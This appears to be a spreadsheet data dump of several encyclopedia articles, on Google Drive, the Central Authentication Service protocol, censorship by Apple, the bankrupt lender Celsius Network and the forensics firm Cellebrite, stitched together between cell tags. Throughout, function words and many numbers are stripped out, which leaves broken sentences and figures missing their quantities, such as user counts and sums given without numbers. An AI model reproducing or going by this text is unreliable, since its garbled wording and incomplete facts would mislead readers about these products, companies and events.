account lapsed reason, users choose current plans. november 2020, google announced charging google photos' storage users exceed limit account. update announced come effect june 2021. before june photos documents uploaded google's online storage counted cap.in september 2021, google added storage plan priced $24.99/month. features sharing google drive incorporates system file sharing creator file folder default, owner. owner regulate public visibility file folder. ownership transferable. files folders shared privately particular users google account, using email address (usually, necessarily, ending @gmail.com) associated account. sharing files users google account requires making accessible "anybody link". this generates secret file, shared email private messages. files folders also made "public web", means indexed search engines thus found accessed anyone. owner also access level regulating permissions. three access levels offered "can edit", "can comment" "can view". users editing access invite others edit. september 2021, portion existing files changed, ostensibly security reasons. third-party apps number external applications work google drive available chrome store. app, users required sign chrome store, apps compatible supported browsers. some apps first-party, google docs, sheets, slides. drive apps operate online files used view, edit, create files various formats, edit images videos, sign documents, manage projects, create flowcharts, etc. drive apps also made default handling file formats supported them. some apps also work offline google chrome chrome os.all third-party apps free install. however, fees associated continued usage access additional features. saving data third-party google drive requires authorization first time.the google drive software development (sdk) works together google drive user interface chrome store create ecosystem apps installed google drive. february 2013, "create" menu google drive revamped include third-party apps, thus effectively granting status google's apps.in march 2013, google released google drive enables third-party developers build collaborative apps support real-time editing. file viewing google drive viewer allows following file formats viewed: native formats (docs, sheets, slides, forms, drawings) image files (.jpeg, .png, .gif, .tiff, .bmp, .webp) video files (.webm, .mpeg4, .3gpp, .mov, .avi, .mpeg, .mpegps, .wmv, .flv, .ogg) audio formats (.mp3, .m4a, .wav, .ogg) text files (.txt) executable program files (.exe) markup/code (.css, .html, .php, .cpp, .hpp, .js) microsoft word (.doc .docx) microsoft excel (.xls .xlsx) microsoft powerpoint (.ppt .pptx) adobe portable document format (.pdf) apple pages (.pages) adobe illustrator (.ai) adobe photoshop (.psd) autodesk autocad (.dxf) scalable vector graphics (.svg) postscript (.eps, .ps) python (.py) fonts (.ttf) paper specification (.xps) archive file types (.zip, .rar, tar, gzip) .mts files image formatsfiles formats also handled third-party apps work google drive, available chrome store. file limits files uploaded, converted google docs, sheets, slides formats, size. there also limits, specific file type, listed below: documents (google docs) 1.02 million characters, regardless number pages font size. document files converted .gdoc docs format cannot larger million bytes). images inserted cannot larger must either .jpg, .png, non-animated .gif formats.spreadsheets (google sheets) million cells, 18,278 columns.presentations (google slides) presentation files converted .gslides slides format cannot larger images inserted cannot larger must either .jpg, .png, non-animated .gif formats. quick access introduced android september 2016, quick access uses machine learning "intelligently predict files need even typed anything". feature announced expanded march 2017, though website interface received feature may. search search results narrowed file type, ownership, visibility, open-with app. users search images describing naming them. example, search "mountain" returns photos mountains, well text documents mountains. text images pdfs extracted using optical character recognition. september 2016, google added "natural language processing" searching google drive website, enabling specific user search queries like "find budget spreadsheet last december". february 2017, google integrated drive google search android, letting users search keywords, switch apps" tab, relevant drive files. backups december 2016, google updated android website "backups" section, listing android device backups saved drive. section lets users backups stored, backups' sizes details, delete backups.in june 2017, google announced app, "backup sync", would able synchronize folder user's computer google. released july 2017. metadata description field available files folders users relevant metadata. content within description field also indexed google drive searchable. accessibility visually impaired june 2014, google announced number updates google drive, included making service accessible visually impaired users. this included improved keyboard accessibility, support zooming high contrast mode, better compatibility screen readers. save google drive browser extension google offers extension google chrome, save google drive, allows users save content google drive browser action context menu. while documents images saved directly, webpages saved form screenshot image visible part page entire page), html, mhtml, google docs file. users need signed chrome extension. mobile apps main google drive mobile supported editing documents spreadsheets april 2014, capability moved separate, standalone apps google docs, google sheets, google slides. google drive android allows users take photo document, sign, text optical character recognition convert text edited. october 2014, android updated material design user interface, improved search, ability custom message sharing file, viewer. encryption before 2013, google encrypt data stored servers. following information united states' national security agency "direct access" servers owned multiple technology companies, including google, company began testing encrypting data july enabled encryption data transit data centers november. however, 2015, google drive provide client-side encryption. professional editions google drive enterprise google drive enterprise (formerly google drive work) business version, part google workspace (formerly google apps work suite), announced google conference june 2014, made available immediately. service features unlimited storage, advanced file audit reporting, ediscovery services, along enhanced administration control apis specifically useful businesses. users upload files large press release posted google's official enterprise blog assured businesses google would encrypt data stored servers, well information transmitted them. google delivers 24/7 phone support business users guaranteed 99.9% uptime servers.in september 2015, google announced google drive work would compliant iso/iec 27018:2014 security privacy standard, confirmed google would data drive work accounts advertising, enabled additional tools handling exporting data, transparency data storage, protection third-party data requests.in july 2018, google announced edition, called drive enterprise, businesses want full google workspace. drive enterprise includes google docs, sheets, slides permits collaborative editing documents, spreadsheets, presentations, drawings, forms, file types. drive enterprise also allows users access collaborate microsoft office files file types. pricing drive enterprise based usage, active user month, plus $0.04 month. google drive education google drive education announced september 2014. made available free google apps education users. includes unlimited storage support individual files size addition full encryption. shared drives september 2016, google announced team drives, later renamed shared drives, google workspace teams collaborate documents store files. shared drives, file/folder sharing ownership assigned team rather individual user. since 2020, shared drives ability assign different access levels files folders different users teams, ability share folder publicly. unlike individual google drive, shared drives offer unlimited storage. drive file stream (soon google drive desktop) march 2017, google introduced drive file stream, desktop application suite (now google workspace) customers using windows macos computers maps google drive drive letter operating system, thus allows easy access google drive files folders without using browser. also features on-demand file access, file downloaded google drive accessed. additionally, drive file stream supports shared drives functionality google workspace.in early 2021, google announced combining drive file stream backup sync products product, google drive desktop, support features previously exclusive respective client. signing client using google workspace enable account expected enable enterprise features google migrating product. docs, sheets slides google docs, google sheets, google slides constitute free, web-based office suite offered google integrated google drive. allows users create edit documents, spreadsheets, presentations online collaborating real-time users. three apps available applications, chrome apps work offline, mobile apps android ios. apps also compatible microsoft office file formats. suite also consists google drawings, google forms, google sites, google keep. while forms sites available applications, drawings also available chrome app, mobile keep also available. suite tightly integrated google drive, files created apps default saved google drive. updates updates docs, sheets, slides introduced features using machine learning, including "explore", offering search results based contents document, answers based natural language questions spreadsheet, dynamic design suggestions based contents slideshow, "action items", allowing users assign tasks users. while google docs criticized lacking functionality microsoft office, received praise simplicity, ease collaboration, frequent product updates. order view edit docs, sheets, slides documents offline, users need using google chrome browser. chrome extension, google docs offline, allows users enable offline support docs, sheets, slides files google drive website.google also offers extension google chrome browser called office editing docs, sheets slides enables users view edit microsoft office documents google chrome, docs, sheets slides apps. extension used opening office files stored computer using chrome, well opening office files encountered form email attachments, search results, etc.) without download them. extension installed chrome default. reception features review google drive launch april 2012, grabham techradar wrote integration google docs google drive confusing", mainly differences user interfaces two, drive offers drive" section specific "shared view shared documents. stated think user interface needs work. it's like retread google docs moment google surely needs work here". considered uploading files "fairly easy", noted folder upload supported google chrome browser. lack native editing microsoft office documents "annoying". regarding google drive's computer apps, stated option settings synchronize specific folders "powerful". wrote drive great addition google armory apps everything work seamlessly", criticizing interface "confusing" file view "not quite intuitive enough" without file icons. grabham also reviewed mobile android app, writing "it's pretty simple enables access files move save offline access wish", praised google docs creation photo uploading "easy". also praised "everything easily searchable".a review michael muchmore magazine february 2016 praised service "truly impressive" creating editing files, describing features "leading" office-suite collaboration. added "compatibility rarely issue", importing exporting options, free storage gigabytes "generous". however, also criticized user interface confusing navigate, wrote "offline editing simple".the android version google drive criticized requiring users individually toggle file offline instead allowing entire folders stored offline. ownership licensing immediately announcement april 2012, google faced criticism google drive privacy. particular, privacy advocates noted google unified terms service privacy policy agreements products services. cnet report, zack whittaker noted "the terms service come heavy fire wider community handles users' copyright intellectual property rights". comparison terms service agreements google drive competing cloud storage services dropbox onedrive, cited paragraph stating google broad rights reproduce, use, create derivative works content stored google drive, license users. although user retains intellectual property rights, user licenses google extract parse uploaded content customize advertising services google provides user promote service. summarized, wrote "according terms, google user-uploaded files google drive, company whatever likes them". highly critical editorial service, bott zdnet wrote language agreements contained "exact words" dropbox used july 2011 privacy policy update sparked criticism forced dropbox update policy clarifying language, adding "it's perfect example google's inability even slightest attention anything happens outside googleplex". matt peckham time criticized lack unique service agreements drive, writing google service warrants privacy firewalling, google drive. this youtube calendar even gmail——the potential someone's sensitive data snooped, whether glean info marketing otherwise, high. [...] google ought create privacy exception “narrows scope” service terms google drive, minimally states company never circulate information generated searching within [sic] g-drive data way."in contrast, report nilay patel verge stated "all services subject harsh scrutiny privacy policies—but close careful reading reveals google's terms pretty much anyone else's, slightly better cases", pointing fact google "couldn't move files around servers, cache data, make image thumbnails" without proper rights. comparing policies competing services, patel wrote "it's clear need exact permissions—they slightly artful language communicate them". growth november 2013, google announced google drive million active users, figure company releasing first time.on june 2014, google developer conference, sundar pichai announced google drive million monthly active users, used fortune companies well universities.on october 2014, atmosphere live event, announced google drive million monthly active users. next noted meant increase million users quarter.on september 2015, announced google drive million organizational paying users.in march 2017, google announced google drive million active users.in 2017, google executive stated company event trillion files stored google drive. downtime issues although google 99.9% uptime guarantee google drive google workspace customers, google drive suffered downtimes consumers business users. during significant downtimes, google's status dashboard gets updated current status service google offers, along details restoration progress. notable downtimes occurred march 2013, october 2014, january 2016, september 2017, january 2020, december 2020.when january 2016 outage resolved, google spokesperson told next web: google, recognize failures statistically inevitable, strive insulate users effects failures. happen instance, apologize everyone inconvenienced event. engineers conducting post-mortem investigation determine make services resilient unplanned network failures, utmost continue make google service outages notable rarity. outage affected google's services five minutes august 2013, cnet reported global internet traffic dropped 40%. spam issues google drive allows users share drive contents google users without requiring authorization recipient sharing invitation. this resulted users receiving spam unsolicited shared drives. google reported working fix. also comparison file hosting services comparison file synchronization software comparison online backup services references external links official website official blog</t>
  </si>
  <si>
    <t>Central Authentication Service</t>
  </si>
  <si>
    <t>central authentication service (cas) single sign-on protocol web. purpose permit user access multiple applications providing credentials (such user password) once. also allows applications authenticate users without gaining access user's security credentials, password. name also refers software package implements protocol. description protocol involves least three parties: client browser, application requesting authentication, server. also involve back-end service, database server, http interface communicates application. when client visits application requiring authentication, application redirects cas. validates client's authenticity, usually checking username password database (such kerberos, ldap active directory). authentication succeeds, returns client application, passing along service ticket. application validates ticket contacting secure connection providing service identifier ticket. gives application trusted information whether particular user successfully authenticated. allows multi-tier authentication proxy address. cooperating back-end service, like database mail server, participate cas, validating authenticity users information receives applications. thus, webmail client webmail server implement cas. history conceived developed shawn bayern yale university technology planning. later maintained drew mazurek yale. implemented single-sign-on. introduced multi-tier proxy authentication. several distributions developed features. december 2004, became project java administration special interest group (jasig), 2008 responsible maintenance development. formerly called "yale cas", also known "jasig cas". 2010, jasig entered talks sakai foundation merge organizations. organizations consolidated apereo foundation december 2012. december 2006, andrew mellon foundation awarded yale first annual mellon award technology collaboration, amount $50,000, yale's development cas. time award "hundreds university campuses (among beneficiaries)". april 2013, protocol specification released. implementation apereo implementation apereo server reference implementation protocol today supports following features: protocol saml protocol oauth protocol openid openid connect protocol ws-federation passive requestor protocol authentication jaas, ldap, rdbms, x.509, radius, spnego, jwt, remote, trusted, basic, apache shiro, mongodb, pac4j more. delegated authentication ws-fed, facebook, twitter, saml idp, openid, openid connect, more. authorization abac, time/date, rest, internet2's grouper more. clustered deployments hazelcast, ehcache, jpa, memcached, apache ignite, mongodb, redis, couchbase more. application registration backed json, ldap, yaml, jpa, couchbase, mongodb more. multifactor authentication security, saaspass, yubikey, rsa, google authenticator (totp) more. administrative manage logging, monitoring, statistics, configuration, client registration more. global per-application user interface theme branding. password management password policy enforcement. django implementation django server django-mama-cas: django central authentication service (cas) single sign-on server django client django-cas-ng: django 1.0/2.0/3.0 client authentication library, support django 2.0, 2.1, 2.2, python 3.5+ also cosign single sign josso list single sign-on implementations openam openid pubcookie saml saml-based products services shibboleth (shibboleth consortium) references external links stanford webauth university minnesota cookieauth apereo project django-mama-cas django-cas-ng</t>
  </si>
  <si>
    <t>Censorship by Apple</t>
  </si>
  <si>
    <t>censorship apple refers apple inc.'s removal, omission, disruption spread content information services subsidiaries, itunes store store (ios), order comply apple's company policies, legal demands, various government censorship laws. itunes books ibooks description moby-dick censored sperm whale april 2010.according daily telegraph, four erotic books, including blonde wet, complete story, allegedly removed chart july 2010.northwest press repeated conflicts apple's content limitations sales ibooks store. 2011, adaptation bouden oscar wilde's play importance being earnest approved addition black bars cover partial male nudity. technology company initially permitted individual issues macy's fearful hunter, rejected collected edition, removed issues. satirical al-qaeda's super secret weapon rejected outright. 2016, northwest published self-censored version hard swallow justin hall dave davenport covering "objectionable" parts images apples original version rejected sexual content. itunes music song censorship there policy censoring profanity song titles itunes. this resulted scunthorpe glitch, inoffensive titles censored coincidental string letters.if song explicit label, marked "explicit" next song title. song marked "explicit" unavailable purchase "restrict explicit content" checked parental controls preference. often "clean" mark next title songs, meaning lyrics censored, available purchase accounts. generally, song marked "clean" explicit version available well. itunes podcasts infowars august 2018, apple removed podcasts created infowars, website owned alex jones, right-wing american conspiracy theorist radio-show host content creator. apple cited hate speech reason removal content. apple's decision remove content sparked major technology companies, including facebook, youtube, spotify, google, removing infowars content. store newspaper magazine content 2009, apple rejected first version "newspapers", iphone users read content newspapers around world, including york times, france's monde, united kingdom tabloid sun. rejected topless "page girls daily features described "obscene". second version application submitted, removing access sun, adding price £0.59. made available summer, release iphone software. another application, similar nature 'newspapers', called 'eucalyptus' allowed users download e-books iphone, though rejected apple e-books could downloaded kama sutra. since lifted. believe moral responsibility keep porn iphone folks want porn android phone. can't adapt european magazines standards utah. store playboy sports illustrated adult-rated apps removed, apps others removed citing adult content resulted accusations hypocrisy. despite this, adult sites continue market iphone ipad users. november 2009, application stern mainstream german weekly magazine print circulation 900,000) deleted several weeks without warning. january 2010, europe's largest newspaper, german tabloid bild, removed content iphone version print edition request apple, later modify applications like stern case nudity. association german magazine publishers (vdz) warned interventions apple might moving towards censorship.november 2010, informational magazine google's danish publisher mediaprovider allowed store.the guardian described rejection explicit content apple analogous distributor smith, main distributor many years imposed content restrictions british publishers. workers fashion magazine dazed confused nicknamed ipad edition "iran edition". pulitzer prize-winning cartoons december 2009, apple banned cartoon called newstoons cartoonist mark fiore, grounds "ridiculed public figures." april 2010, fiore pulitzer prize political satire cartoons, making history first internet-only cartoonist prestigious journalistic prize. following public outcry story broke wake award, apple asked fiore resubmit app, subsequently accepted. fiore said, "sure, mine might approved, someone pulitzer maybe making better political mine? need media frenzy approved political material?" baby shaker april 2009, game called baby shaker approved store later removed complaints. game allowed user shake phone image cartoon baby screen died. nine inch nails 2009, trent reznor rock band nine inch nails announced, twitter account, apple rejected update nine inch nails application "objectionable content". developer posted message nine inch nails discussion boards explaining situation further: v1.0 live. v1.0.3 rejected content content mainly stability release crashes international users. fixed hours went live waiting apple approve ever since. meanwhile continues growing number star ratings international users understandably frustrated bug. looks like hands tied. apple later permitted update. iphone ebook december 2009, lando's ebook "take control iphone rejected apple. permitted back store references jailbreaking removed. phone story 2011, apple banned game called phone story explored ethical challenges smartphone manufacturing, including conflict minerals, environmental waste, troubled labor practices. game eventually published creator molleindustria. drone strike august 2012, josh begley created iphone sent push notification whenever u.s. military struck target. rejected apple finding content "objectionable crude." utilities march 2013, hiddenapps approved appeared store. this provided access developer diagnostic menus, allowed stock apps hidden enabled opt-out feature iads, apple's developer driven advertisement system. educational july 2013, tech education startup called treehouse claimed apple refused release contained lessons android. papers, please video game papers, please, centered around operation border checkpoint, brought ipad december 2014, developer lucas pope forced remove pixelated nudity game's full-body scanner allowed release game apple devices. after days, pope permitted upload full version game store including pixelated nudity apparent reversal apple. however, still rated store. france musique removal 2015, apple removed france musique application store airing "inappropriate content" podcast. application displayed painting édouard manet, olympia, depicting mild nudity. podcast application submitted store again, rating. chaos computer club videos security vulnerabilities october 2015, apple rejected custom streaming application apple created members frankfurt branch chaos computer club, europe's largest hacker association. application meant show recordings talks chaos computer club's conferences. according blog post written incident, apple's reason "some videos show hack apple devices". recordings publicly available hosted youtube well. using youtube still allows playback content apple devices. binding isaac: rebirth apple banned video game binding isaac: rebirth appearing store cartoon depictions violence towards children. game subsequently accepted next year, rating. telegram telegram february 2018, apple removed telegram telegram encrypted messaging applications made telegram messenger llp, store content deemed inappropriate. apple specifically cited instances child pornography made available users, subsequently banned apps situation could dealt with. infowars apple removed infowars store september 2018 citing content violated policy indecent material. apple's simply prevents users downloading app, restrict access installed. tumblr november 2018, apple removed tumblr store tumblr's failure filter child pornography. tumblr uses database known child pornography automatically detect remove child pornography website, however found evidence images database present tumblr. response ban, tumblr removed instances child pornography since moved pornographic material platform december 2018. historical games december 2018, apple removed strategy game afghanistan fact featured real-life combatants. slitherine, developers game, countered main objectives focused supporting afghan civilians rather defeating taliban. this followed temporary game ultimate general: gettysburg featuring confederate flag historical context. hkmap october 2019, apple removed hkmap.live store. hkmap used track locations protests police hong kong. apple stated "allowed users evade enforcement". "apple takes purchase." facebook events 2020, apple forced facebook remove message informing users apple took fees paid online events. apple claimed notification store policy "irrelevant" information, position facebook disagreed with. navalny 2021, apple google removed navalny store google play store respectively. pulled russia's parliamentary elections cause app's creator, alex navalny, supporters claim companies taking part political suppression. apple sent letter navalny's affiliates stating content illegal russia. censorship country following instances censorship information control imposed apple stores united states store. many imposed pressure foreign governments effect comply laws. china early 2015, apple shut news inside china.in 2017, apple restricted emoji flag republic china devices used mainland china. year, apple removed voice america china behest cyberspace administration china.apple removes vpns chinese store order comply chinese government stay market. apple, cook, stated censor now, rules censorship china relax.in 2018, apple's restrictions sending word "taiwan" sending emoji representing flag taiwan idevices using chinese country code language settings caused devices crash.in 2018, apple removed apps chinese store allowed users access content forbidden chinese government. many apps gave users access virtual private networks could allow circumvent great firewall china. apple cite chinese laws, claimed apps broke laws local governments. among apps removed vyprvpn, golden frog, company filed amicus brief supporting apple fbi–apple encryption dispute. apple first foreign global technology company concede chinese government's demands.artists reference tiananmen square protests music removed itunes, including jacky cheung hok-yau ming pair.in 2021, apple removed quran bible chinese store. apple also removed popular daily prayer muslims china. iran february 2017, apple restricted payment services iranian apps comply u.s. sanctions forbade iranian currency entering united states. iranian apps responded implementing iranian electronic payment service.in august 2017, apple removed many iranian apps store citing u.s. sanctions placed iran. while apple neither stores iran specific versions store country, iranian citizens able access apple products content external sources. apple removed many apps developed specifically iranians, including ride-sharing service called snapp, food delivery service called delionfoods.in april 2018, apple blocked telegram iran response concerns access encrypted messaging service presented threat iranian national security. russia 2018, apple played role censorship telegram, encrypted messaging used globally. interested surveying encrypted messages, russian government demanded telegram provide decryption keys federal security service. when telegram refused, russian government threatened apple legal repercussions block telegram russian store eliminate push notification feature. founder telegram, pavel durov, publicly claimed apple restricted telegram users across world updating app; action could cause problems telegram's ability meet regulations. taiwan august 2021, citizen university toronto found apple censors engravings taiwan related chinese communist party, mainland chinese state bodies, falun gong. also censorship google play censorship google censorship youtube censorship twitter references</t>
  </si>
  <si>
    <t>Celsius Network</t>
  </si>
  <si>
    <t>celsius network bankrupt cryptocurrency lending company. headquartered hoboken, jersey, celsius maintains offices four countries operates globally. users could deposit range cryptocurrency digital assets, including bitcoin ethereum, celsius wallet earn percentage yield, could take loans pledging cryptocurrencies security. 2022, company lent billion clients almost billion assets management.in june 2022, company gained notoriety indefinitely paused transfers withdrawals "extreme market conditions", resulting steep declines price bitcoin cryptocurrencies. july 2022, celsius filed chapter bankruptcy. business model company facilitated lending borrowing users. depositors earned interest depositing qualifying cryptocurrencies, rate interest dependent upon cryptocurrency deposited (e.g., 6.2% interest bitcoin). company paid interest cryptocurrencies, including token. borrowers paid zero 8.95% bitcoin-backed loans, depending loan-to-value ratio. some money celsius used fund loans came hedge funds looking higher yields banks pay.celsius generated revenue token sales, lending, bitcoin mining, discretionary trading cryptocurrencies. celsius claimed revenue returned user community interest payments deposits made platform. company charge fees users.on july 2022, former investment manager jason stone sued celsius, alleging company ponzi scheme. history celsius founded 2017 alex mashinsky, daniel leon, nuke goldstein. growth march 2018, celsius raised million initial coin offering (ico) digital currency. april 2018, cryptocurrency began trading cryptocurrency exchanges. advance ico, celsius listed currency security. june 2018, celsius launched mobile app. 2019, celsius completed million equity round $140 million valuation.in august 2020, celsius raised million equity crowdfunding support operations. fall 2020, price celsius's currency climbed 230% less month.in november 2020, celsius said plans open office australia expand office israel.in december 2020, celsius $3.31 billion assets management. january 2021, celsius $4.5 billion assets.in october 2021, celsius raised $400 million equity investors. funding round westcap, fund former airbnb executive laurence tosi, cdpq, canada's second largest pension fund. funding round valued celsius billion. time, celsius's office israel employed people.in november 2021, celsius acquired israeli cybersecurity company $115 million. controversies regulatory scrutiny april 2021, celsius confirmed security breach occurred systems; third-party server customer data compromised, resulting portion company's customer list exfiltrated phishing email sent celsius customers.in september 2021, authorities number states said celsius's interest-bearing cryptocurrency accounts constitute unregistered securities offering. attorney general jersey ordered celsius stop issuing interest-bearing cryptocurrency products cease-and-desist order. texas state regulators filed notice seeking hearing february 2022 determine whether take similar action. kentucky's securities regulator told celsius cease desist offering interest-paying accounts state. celsius alex mashinsky said "very confident" none celsius's products united states securities. celsius said working states order provide clarity business operations.on october 2021, celsius received request information york attorney general, letitia james. earlier month, celsius us$400 million equity funding investors.on november 2021, celsius announced senior employees focus israeli police probe associated prior employment activities; employee later suspended. decline bankruptcy celsius using crypto custodian prime trust store customer assets since march 2020. this relationship ended june 2021, prime trust's risk team expressed concern celsius's strategy "endlessly re-hypothecating assets lending assets juice yields". prime trust founder scott purcell suggested re-hypothecating "would destined failure sharp market movement either direction would catastrophic ridiculously leveraged business model".cnbc described celsius "one largest players crypto lending space" second quarter 2022. company issued loans totaling billion, may, almost billion assets management. june 2022, celsius said million customers offered yields high year.on june blog post entitled "damn torpedoes, full speed ahead," celsius addressed rumors company lost client funds making poor investments facing liquidity crisis. company dismissed rumors actions "vocal actors spreading misinformation". blog post denied claims celsius sustained significant losses result collapse luna preceding month.on june weekly "ask mashinsky anything" session youtube, denied celsius problems clients' access funds suggested critics paid competitors. mashinsky said live stream, "celsius billions liquidity, right, provide immediate access everybody". around time, mashinsky questioning skeptical commenters twitter, accusing spreading fear, uncertainty, doubt celsius.on june company paused customer withdrawals order stabilize liquidity operations", citing "extreme market conditions." after announcement, prices bitcoin ethereum decreased respectively previous day. celsius's token, trading almost year prior, one-third withdrawal pause announcement, falling $0.21. total market value cryptocurrencies fell $983 billion, marking first time since january 2021 cryptocurrency market collectively worth less trillion. news also caused decline share price celsius holdings, unrelated beverage company, june investor confusion companies' names. beverage company's shares increased following day.rod bolger, joined celsius january 2022, resigned june celsius appointed chris ferraro, head financial planning, analysis, investor relations, succeed bolger. celsius network laid employees, quarter workforce, early july.celsius filed chapter bankruptcy july month pausing withdrawals. declaration filed following day, mashinsky reported $1.2 billion deficit balance sheet. mashinsky said company "made what, hindsight, proved certain poor asset deployment decisions". according bankruptcy filing, company $167 million cash hand, said would provide "ample liquidity" support operations bankruptcy. estimated $600 million company's assets form token, primarily issued connection company’s loyalty rewards program. mashinsky's july declaration also stated company borrowed approximately $648 million using defi protocols, celsius uses defi loans finance operations. celsius's $5.5 billion total liabilities time bankruptcy filing, company owed $4.7 billion users, listed unsecured creditors. celsius's choice chapter bankruptcy would prioritize repayments secured creditors first, unsecured creditors, equity holders. aftermath after celsius filed bankruptcy july 2022, molly white tweeted list excerpts customer letters bankruptcy court judge. among stories concerns celsius frozen funds statements company's negative impact customers' lives. bankruptcy website, company said intends offer options customers, recover either cash discount remain 'long' crypto."celsius's bankruptcy filing ascribed $1.2 billion deficit modern version bank run, depositors, anxious security funds, withdraw funds great numbers. critic celsius told news, "this another bank run. you're reinventing anything here. they promoting services better savings account another unsecured lender."in filing dated july 2022, celsius said intended hire bolger, former cfo, assist bankruptcy proceedings advisor. company intended bolger $120,000 (about $92,000 usd) month least weeks. august celsius withdrew motion rehire bolger.six lawyers specializing bankruptcies, restructuring, cryptocurrency told reuters little precedent bankruptcies cryptocurrency companies. "this could last years," said attorney celsius's bankruptcy process.the sudden customer withdrawals bankruptcy celsius holdings commentators highlight lack deposit insurance cryptocurrency sector. celsius's terms permitted company halt trading users. without deposit insurance, entity obligated compensate celsius's users prioritize highly investors company enter liquidation. securities regulators five u.s. states announced investigations celsius's withdrawal freeze within three days company's announcement. federal entities federal deposit insurance corporation (fdic) considered extending deposit insurance stablecoin investors, fdic protections crypto investors existed time celsius's withdrawal freeze.celsius's collapse exemplified commentator called "pervasive problem crypto industry, financial services claim decentralized actually centralized entities, power control flow crypto assets." bankruptcies centralized cryptocurrency financial institutions like celsius investors lose trust centralized storage move funds onto hardware cryptocurrency wallets. references</t>
  </si>
  <si>
    <t>Cellebrite</t>
  </si>
  <si>
    <t>cellebrite israeli digital intelligence company provides tools federal, state, local enforcement well enterprise companies service providers collect, review, analyze manage digital data. april 2021, cellebrite announced plans public merger blank-check firm, valuing company approximately $2.4 billion. their flagship product series cellebrite ufed. overview cellebrite headquartered petah tikva, israel. fourteen offices around globe, including business centers washington, d.c., munich, germany, singapore. cellebrite fully owned subsidiary corporation (jasdaq: 6736) based nagoya, japan. 2017, cellebrite's mobile lifecycle division rebranded mobilogy.mobilogy produces hardware software phone-to-phone data transfer, backup, mobile applications electronic software distribution, data analysis tools. mobilogy products used various mobile operators, deployed wireless retail points sale. mobilogy works handset manufacturers ensure compatibility devices released public.cellebrite's mobile forensics division established 2007 produces digital forensics intelligence tools enforcement, intelligence agencies, military branches, corporate security investigations, firms; private digital forensic examiners. history cellebrite established israel 1999 yablonka, yaron baratz, yuval aflalo.ron serber joined cellebrite 2001 yossi carmil joined 2004. since 2005 served co-ceo's serber left company 2020. yossi carmil current company ceo. cellebrite first manufactured hardware software offered compressive phone-to-phone data transfer devices, contact synchronization content transfer tools mobile phones, intended wireless carrier sales support staff retail stores. 2007, cellebrite established independent division targeted mobile forensics industry.that year, cellebrite acquired futuredial incorporated major shareholders, corporation japan. today corporation cellebrite's largest shareholder. 2019 israeli growth partners (igp) invested $110 million cellebrite.in 2020, cellebrite acquired blackbag technologies, forensics company focus computer forensics. acquisition allowed cellebrite expand digital intelligence solution offerings include data collection tools computers.in 2021, cellebrite announced business combination agreement plan merger tech holdings corporation. once completed, cellebrite would become publicly listed company nasdaq ticker symbol, “clbt”; forma implied equity value cellebrite post-merger expected approximately $2.4 billion. technology 2019, cellebrite announced version ufed, called ufed premium. company claimed unlock devices including running 12.3 android phones galaxy s9.in 2021, moxie marlinspike, creator encrypted messaging signal, pointed number vulnerabilities cellebrite's ufed physical analyzer software allowed arbitrary code execution windows computers running software. exploit detailed involved ufed scanning specially formatted file could used execute arbitrary code computer running ufed. marlinspike wrote code could "[modify] cellebrite report created scan, also previous future generated cellebrite reports previously scanned devices future scanned devices arbitrary way". marlinspike also found cellebrite software bundled out-of-date ffmpeg files 2012, lacked subsequent security updates. windows installer packages, extracted windows installer itunes signed apple, also found, said raised legal concerns. cellebrite responded company committed protecting integrity customers' data, continually audit update software order equip customers best digital intelligence solutions available." report signal followed announcement cellebrite 2020 developed technology crack encrypted messages signal app, claim company later retracted downplayed.the announcement marlinspike raised questions integrity data extracted software, prompted cellebrite patch vulnerabilities found signal remove full support analyzing iphones. enforcement assistance april 2011, michigan chapter american civil liberties union questioned whether michigan state police (msp) troopers using cellebrite ufeds conduct unlawful searches citizens' cell phones. following refusal grant aclu michigan's 2008 freedom information request unless organization paid $544,000 retrieve reports, issued statement claiming honored fourth amendment searching mobile devices.in march 2016, reported cellebrite offered unlock iphone involved fbi–apple encryption dispute. later, announced successfully accessed iphone thanks third party. press report claimed cellebrite assisted unlocking device, source denied.a 2017 data dump suggests cellebrite sold data extraction products turkey, united arab emirates russia.on september 2020, haaretz reported cellebrite provided saudi arabia mobile phone hacking services. staff cellebrite demanded saudis send government representative meet employees king khalid international airport riyadh. following demand, representative cellebrite traveled riyadh november 2019 hacking attempt phone possession saudi justice ministry employee. cellebrite representative called authorities pass passport control without getting passport stamped electronic equipment checked, remaining possession. hacker supposed head isolated hotel room airport, process planned executed without electronic surveillance. cellebrite representative returned riyadh airport back london.in 2017, cellebrite entered contract u.s. immigration customs enforcement (ice) $2.2 million. june 2019, another contract signed million. 2019 contract “universal forensic extraction devices (ufed), accessories licenses, training support services” year, option extend five years. hong kong august 2020, technology review reported cellebrite sold services hong kong police force unlocking phones detained demonstrators 2019–20 hong kong protests. october 2020, company announced would stop selling solutions services customers hong kong china result change u.s. regulations. eastern europe cellebrite's ufed program used persecute democratic opposition belarus russia. march 2021, finding technology used lyubov sobol affair, jerusalem activist filed lawsuit company israeli supreme court. company announced termination cooperation russia belarus shortly afterwards. henry borel case march 2021, civil police janeiro state opened investigation mysterious death 4-year henry borel. boy's stepfather jairinho mother monique medeiros arrested obstructing investigation boy's death investigated homicide. janeiro police used cellebrite devices extract deleted whatsapp messages jairinho, medeiros, henry's nanny, department described "essential technical evidence" case. freeland wildlife trafficking october 2018, freeland, global, non-profit organization fights wildlife human trafficking, called assist thai police investigation vietnamese males suspected wildlife trafficking. freeland's forensics experts dispatched scene provide on-the-job training. using cellebrite devices, police discovered evidence poaching coordinators arrived thailand sponsor targeted hunting thailand, malaysia possibly myanmar. leicestershire police november 2015, 15-year kayleigh haywood measham, leicestershire found dead. leicestershire police used cellebrite device unlock kayleigh's badly damaged smartphone, talking whereabouts. this evidence uncovered kayleigh's murderer stephen beardman, groomer, luke harlow, cleared suspect near scene crime time murder. security breaches january 2017, reported unknown hacker acquired worth confidential data cellebrite's external servers. data dump includes alleged usernames passwords logging cellebrite databases connected company's my.cellebrite domain, also contains appear evidence files seized mobile phones, logs cellebrite devices. dumped data suggested cellebrite sold data extraction products countries turkey, united arab emirates russia. references</t>
  </si>
  <si>
    <t>Cellebrite UFED</t>
  </si>
  <si>
